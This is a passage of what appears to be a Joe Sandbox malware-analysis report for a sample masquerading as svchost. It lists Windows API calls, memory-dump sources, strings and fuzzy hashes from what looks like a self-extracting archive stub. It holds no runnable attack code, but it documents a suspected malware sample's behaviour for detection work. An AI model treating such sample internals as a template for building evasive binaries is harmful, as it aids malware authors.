                                                            • Opcode ID: f838c3a4307665f342b6836698312cde96857536b467cd54e4487c1f64814c3c
                                                            • Instruction ID: e1363d80f12fffaca279622272713bb2ecc0ddd0c7cb2941e6a67a819ca196c8
                                                            • Opcode Fuzzy Hash: f838c3a4307665f342b6836698312cde96857536b467cd54e4487c1f64814c3c
                                                            • Instruction Fuzzy Hash: 1601F736108711AEAA152F787C859262FA9FF127B7B61173AFD10D50E0FF915C0C9246
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00871030,00854674,00871030,?,?,00853F73,00000050,?,00871030,00000200), ref: 008597E9
                                                            • _free.LIBCMT ref: 0085981C
                                                            • _free.LIBCMT ref: 00859844
                                                            • SetLastError.KERNEL32(00000000,?,00871030,00000200), ref: 00859851
                                                            • SetLastError.KERNEL32(00000000,?,00871030,00000200), ref: 0085985D
                                                            • _abort.LIBCMT ref: 00859863
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: 2875021a1cfa2ec65dba1d9957098ae35cbc3059c2fb7d1e18cb8ca2db47c9d8
                                                            • Instruction ID: 8844b07cfbafff51f7d2323b7607ce6118491037b4e336ce155a82feac8fc531
                                                            • Opcode Fuzzy Hash: 2875021a1cfa2ec65dba1d9957098ae35cbc3059c2fb7d1e18cb8ca2db47c9d8
                                                            • Instruction Fuzzy Hash: A0F0C835144A05F6CA1233387C4AA2B2AA5FFE2773F250134FD58E6292FF60C80D4567
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0084DC47
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0084DC61
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084DC72
                                                            • TranslateMessage.USER32(?), ref: 0084DC7C
                                                            • DispatchMessageW.USER32(?), ref: 0084DC86
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0084DC91
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 2148572870-0
                                                            • Opcode ID: b5ba7617ce995e266aa63a06dca51fae9ee38991651921f3c818c459d5c051d1
                                                            • Instruction ID: 3c2e76b298890f5847d9fe9905b992c4c4d00988d9e14998d2baf4fc19d157ce
                                                            • Opcode Fuzzy Hash: b5ba7617ce995e266aa63a06dca51fae9ee38991651921f3c818c459d5c051d1
                                                            • Instruction Fuzzy Hash: 69F04F72A01219BBCB206BA5EC4DDCF7F7DFF42791B044012F50AD2060D674C64ACBA1
                                                            APIs
                                                              • Part of subcall function 008405DA: _wcslen.LIBCMT ref: 008405E0
                                                              • Part of subcall function 0083B92D: _wcsrchr.LIBVCRUNTIME ref: 0083B944
                                                            • _wcslen.LIBCMT ref: 0083C197
                                                            • _wcslen.LIBCMT ref: 0083C1DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcsrchr
                                                            • String ID: .exe$.rar$.sfx
                                                            • API String ID: 3513545583-31770016
                                                            • Opcode ID: dcbc389547e6513ccdb73347fd943969dc55f3f9c2c80a9238dde732a7300a95
                                                            • Instruction ID: 184ee7e7893289fe16bb298e69024179e6f2d3c3e6def1c41894d0f9da5d1f4d
                                                            • Opcode Fuzzy Hash: dcbc389547e6513ccdb73347fd943969dc55f3f9c2c80a9238dde732a7300a95
                                                            • Instruction Fuzzy Hash: BB41482650075995C736AF788852A7FB7A8FFC1744F10090EF9A2FB182EB644D81D3D6
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 0084CE9D
                                                              • Part of subcall function 0083B690: _wcslen.LIBCMT ref: 0083B696
                                                            • _swprintf.LIBCMT ref: 0084CED1
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                            • SetDlgItemTextW.USER32(?,00000066,0087946A), ref: 0084CEF1
                                                            • EndDialog.USER32(?,00000001), ref: 0084CFFE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: %s%s%u
                                                            • API String ID: 110358324-1360425832
                                                            • Opcode ID: 1dd8125d7ebf64e62c23152a2b13c5f7d99d387cce35906ae829c3355da48631
                                                            • Instruction ID: 90128df52e63059e18bbfef54399f4a7c2051ab64d70c8b89b471e4fca006e59
                                                            • Opcode Fuzzy Hash: 1dd8125d7ebf64e62c23152a2b13c5f7d99d387cce35906ae829c3355da48631
                                                            • Instruction Fuzzy Hash: 844190B190061CAADF25DB54CC45EEE77BCFB05304F4080A6FA09E7151EEB49A84CF62
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 0083BB27
                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0083A275,?,?,00000800,?,0083A23A,?,0083755C), ref: 0083BBC5
                                                            • _wcslen.LIBCMT ref: 0083BC3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 3341907918-253988292
                                                            • Opcode ID: e0007b6ba827845808d06b87df578f85d2b43b3fbd86ca90be6358d38af90c45
                                                            • Instruction ID: 19aa7aff296aa19d6fe3410b621f860aed601c9ee2702ce33161b6013f92445f
                                                            • Opcode Fuzzy Hash: e0007b6ba827845808d06b87df578f85d2b43b3fbd86ca90be6358d38af90c45
                                                            • Instruction Fuzzy Hash: 0C41BFB1400219A6CB31AF64CC42EEB77A8FFC1394F108425FA54E3151EB78DE918AE1
                                                            APIs
                                                            • LoadBitmapW.USER32(00000065), ref: 0084B6ED
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0084B712
                                                            • DeleteObject.GDI32(00000000), ref: 0084B744
                                                            • DeleteObject.GDI32(00000000), ref: 0084B767
                                                              • Part of subcall function 0084A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0084B73D,00000066), ref: 0084A6D5
                                                              • Part of subcall function 0084A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0084B73D,00000066), ref: 0084A6EC
                                                              • Part of subcall function 0084A6C2: LoadResource.KERNEL32(00000000,?,?,?,0084B73D,00000066), ref: 0084A703
                                                              • Part of subcall function 0084A6C2: LockResource.KERNEL32(00000000,?,?,?,0084B73D,00000066), ref: 0084A712
                                                              • Part of subcall function 0084A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0084B73D,00000066), ref: 0084A72D
                                                              • Part of subcall function 0084A6C2: GlobalLock.KERNEL32(00000000), ref: 0084A73E
                                                              • Part of subcall function 0084A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0084A762
                                                              • Part of subcall function 0084A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0084A7A7
                                                              • Part of subcall function 0084A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0084A7C6
                                                              • Part of subcall function 0084A6C2: GlobalFree.KERNEL32(00000000), ref: 0084A7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                            • String ID: ]
                                                            • API String ID: 1797374341-3352871620
                                                            • Opcode ID: ca2f0a07a358517ec8d05307b8b33a6350af84482ef2114484033c60644d4933
                                                            • Instruction ID: 0780b7174a9d2a4445d6bf25d7f39490b4784bf4165296ea38768b4d36eb999a
                                                            • Opcode Fuzzy Hash: ca2f0a07a358517ec8d05307b8b33a6350af84482ef2114484033c60644d4933
                                                            • Instruction Fuzzy Hash: 4F01F53658060D67C71277B89C4AA7F7ABAFFC0B62F0A0011F900EB295EF31CD0542A2
                                                            APIs
                                                              • Part of subcall function 00831316: GetDlgItem.USER32(00000000,00003021), ref: 0083135A
                                                              • Part of subcall function 00831316: SetWindowTextW.USER32(00000000,008635F4), ref: 00831370
                                                            • EndDialog.USER32(?,00000001), ref: 0084D64B
                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0084D661
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 0084D675
                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 0084D684
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: RENAMEDLG
                                                            • API String ID: 445417207-3299779563
                                                            • Opcode ID: eeb26298ae4cdd202632618ac77363dd3d03ef06a2c587636b4dc7c834c2b581
                                                            • Instruction ID: 4a8e74d4520bfe724d8f66e71f76c3a689eb780a074987ef49f078ff1484f8ab
                                                            • Opcode Fuzzy Hash: eeb26298ae4cdd202632618ac77363dd3d03ef06a2c587636b4dc7c834c2b581
                                                            • Instruction Fuzzy Hash: 6C014C3328531CBBD6105F689D09F57776DFBAAB01F020411F305E20D1C7A29A148BB9
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00857E24,00000000,?,00857DC4,00000000,0086C300,0000000C,00857F1B,00000000,00000002), ref: 00857E93
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00857EA6
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00857E24,00000000,?,00857DC4,00000000,0086C300,0000000C,00857F1B,00000000,00000002), ref: 00857EC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 7040037cd27d0cc9384cd0cbeade0a04db1807798e82297bab3aae1edff93fbe
                                                            • Instruction ID: 77bc76ce71ff68cf08a51423ebac7060492ddedb3eb0a40cb3e33fa41596b36b
                                                            • Opcode Fuzzy Hash: 7040037cd27d0cc9384cd0cbeade0a04db1807798e82297bab3aae1edff93fbe
                                                            • Instruction Fuzzy Hash: F2F06831904208BBCB119FA4DC09B9EBFB9FF44712F0181A9FD05E6250DB749E54CB95
                                                            APIs
                                                              • Part of subcall function 0084081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00840836
                                                              • Part of subcall function 0084081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083F2D8,Crypt32.dll,00000000,0083F35C,?,?,0083F33E,?,?,?), ref: 00840858
                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0083F2E4
                                                            • GetProcAddress.KERNEL32(008781C8,CryptUnprotectMemory), ref: 0083F2F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                            • API String ID: 2141747552-1753850145
                                                            • Opcode ID: e09312784fd137544de0b47baef5b4b2bf88ed08ee18f16de907dd998dc06fca
                                                            • Instruction ID: 9e55c5d88b1921cbd9943dc7e98d0fc345da80ada278dbd3c17c43f523811213
                                                            • Opcode Fuzzy Hash: e09312784fd137544de0b47baef5b4b2bf88ed08ee18f16de907dd998dc06fca
                                                            • Instruction Fuzzy Hash: 33E08670D14F129EC7209FB8984DB027AD4FF44701F15982DF1EAD3781DAB8D5408B91
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AdjustPointer$_abort
                                                            • String ID:
                                                            • API String ID: 2252061734-0
                                                            • Opcode ID: 17a1f8e510c13bbfb3c276eb497c0e34d62ba1340094040cf1a72765ee6b14e3
                                                            • Instruction ID: 8a009839fc4e710de41735ed1b773c28a7e5e8b7dea391eb419669a77fc64513
                                                            • Opcode Fuzzy Hash: 17a1f8e510c13bbfb3c276eb497c0e34d62ba1340094040cf1a72765ee6b14e3
                                                            • Instruction Fuzzy Hash: 9C51F87250021AAFDB298F18D845BBA73B5FF55312F24412DEC05C76A2EB31ED48D791
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0085BF39
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0085BF5C
                                                              • Part of subcall function 00858E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0085CA2C,00000000,?,00856CBE,?,00000008,?,008591E0,?,?,?), ref: 00858E38
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0085BF82
                                                            • _free.LIBCMT ref: 0085BF95
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0085BFA4
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: 604a0e771a2a5323935fcd3e2dfad6d67fc84b337961447da095144c42af6615
                                                            • Instruction ID: ef8803f54251d95927cb8fdbcdb763c9c757e2b53c9363c7fde4c0f8c4d3d24f
                                                            • Opcode Fuzzy Hash: 604a0e771a2a5323935fcd3e2dfad6d67fc84b337961447da095144c42af6615
                                                            • Instruction Fuzzy Hash: 2901A272A05615BF23211ABA5C8DC7F7A6EFED3BA23150129FD04D3241EFA0CD0595B1
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00871030,00000200,008591AD,0085617E,?,?,?,?,0083D984,?,?,?,00000004,0083D710,?), ref: 0085986E
                                                            • _free.LIBCMT ref: 008598A3
                                                            • _free.LIBCMT ref: 008598CA
                                                            • SetLastError.KERNEL32(00000000,00863A34,00000050,00871030), ref: 008598D7
                                                            • SetLastError.KERNEL32(00000000,00863A34,00000050,00871030), ref: 008598E0
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 3a060a64772845c14cf13834457633627fc9a442972d2f3bd05748fbaebb205b
                                                            • Instruction ID: 3e589496a936ce50efd3557a44577db2bd29c291eb4e5144ff1a6f02f839ae3d
                                                            • Opcode Fuzzy Hash: 3a060a64772845c14cf13834457633627fc9a442972d2f3bd05748fbaebb205b
                                                            • Instruction Fuzzy Hash: 6601F436144B09EBC21227686C8591B256DFBE3777B260135FD55E2292EF608C0D5162
                                                            APIs
                                                              • Part of subcall function 008411CF: ResetEvent.KERNEL32(?), ref: 008411E1
                                                              • Part of subcall function 008411CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 008411F5
                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00840F21
                                                            • CloseHandle.KERNEL32(?,?), ref: 00840F3B
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 00840F54
                                                            • CloseHandle.KERNEL32(?), ref: 00840F60
                                                            • CloseHandle.KERNEL32(?), ref: 00840F6C
                                                              • Part of subcall function 00840FE4: WaitForSingleObject.KERNEL32(?,000000FF,00841206,?), ref: 00840FEA
                                                              • Part of subcall function 00840FE4: GetLastError.KERNEL32(?), ref: 00840FF6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 1868215902-0
                                                            • Opcode ID: 073fd0ab8825baf1911e83a7725a9ae1e951cf1dd482a9c6f38e85178d46f15d
                                                            • Instruction ID: b204105a343de48a39ec57290adebdc100c47fc3d0f5f17ae58ef4c07c49b048
                                                            • Opcode Fuzzy Hash: 073fd0ab8825baf1911e83a7725a9ae1e951cf1dd482a9c6f38e85178d46f15d
                                                            • Instruction Fuzzy Hash: D5017571100B44FFC7229B64DC84BC6FBA9FB08710F010929F26B921A0CBB57A58CB55
                                                            APIs
                                                            • _free.LIBCMT ref: 0085C817
                                                              • Part of subcall function 00858DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34), ref: 00858DE2
                                                              • Part of subcall function 00858DCC: GetLastError.KERNEL32(00863A34,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34,00863A34), ref: 00858DF4
                                                            • _free.LIBCMT ref: 0085C829
                                                            • _free.LIBCMT ref: 0085C83B
                                                            • _free.LIBCMT ref: 0085C84D
                                                            • _free.LIBCMT ref: 0085C85F
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 570151b8b167c4eb387a936d02d6be71f59c95a1fbc1384d639206afc7abc296
                                                            • Instruction ID: 43278dd86f2e5b41979c3f217bf3e2a59d5ec22cd1f031c541e1e31172a24ff1
                                                            • Opcode Fuzzy Hash: 570151b8b167c4eb387a936d02d6be71f59c95a1fbc1384d639206afc7abc296
                                                            • Instruction Fuzzy Hash: ECF01236504304EF8620DB6CF485C1677F9FA10756755282AF948E7552CFB1FC88CE55
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00841FE5
                                                            • _wcslen.LIBCMT ref: 00841FF6
                                                            • _wcslen.LIBCMT ref: 00842006
                                                            • _wcslen.LIBCMT ref: 00842014
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0083B371,?,?,00000000,?,?,?), ref: 0084202F
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
